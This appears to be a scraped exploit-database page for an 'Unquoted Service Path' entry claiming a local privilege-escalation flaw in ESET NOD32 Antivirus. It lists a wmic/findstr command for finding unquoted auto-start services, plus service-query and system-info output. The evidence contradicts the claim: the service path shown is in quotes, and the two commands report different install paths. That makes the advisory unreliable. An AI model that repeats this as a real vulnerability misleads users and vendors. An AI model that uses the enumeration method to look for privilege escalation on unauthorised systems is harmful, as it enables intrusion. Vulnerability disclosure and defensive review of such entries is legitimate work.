
6 changes to exploits/shellcodes/ghdb Computer Laboratory Management System v1.0 - Multiple-SQLi Petrol Pump Management Software v1.0 - Remote Code Execution (RCE) Quick CMS v6.7 en 2023 - 'password' SQLi Wordpress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS) ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path
32 lines
No EOL
1 KiB
Text
32 lines
No EOL
1 KiB
Text
# Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path
|
|
# Exploit Author: Milad Karimi (Ex3ptionaL)
|
|
# Exploit Date: 2024-04-01
|
|
# Vendor : https://www.eset.com
|
|
# Version : 17.0.16.0
|
|
# Tested on OS: Microsoft Windows 10 pro x64
|
|
|
|
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|
|
|findstr /i /v "c:\windows\\" |findstr /i /v """
|
|
|
|
ESET Updater ESETServiceSvc C:\Program Files (x86)\ESET\ESET
|
|
Security\ekrn.exe
|
|
|
|
C:\>sc qc ekrn
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME: ekrn
|
|
TYPE : 20 WIN32_SHARE_PROCESS
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME : "C:\Program Files\ESET\ESET Security\ekrn.exe"
|
|
LOAD_ORDER_GROUP : Base
|
|
TAG : 0
|
|
DISPLAY_NAME : ESET Service
|
|
DEPENDENCIES :
|
|
SERVICE_START_NAME : LocalSystem
|
|
|
|
C:\>systeminfo
|
|
|
|
OS Name: Microsoft Windows 10 Pro
|
|
OS Version: 10.0.19045 N/A Build 19045
|
|
OS Manufacturer: Microsoft Corporation |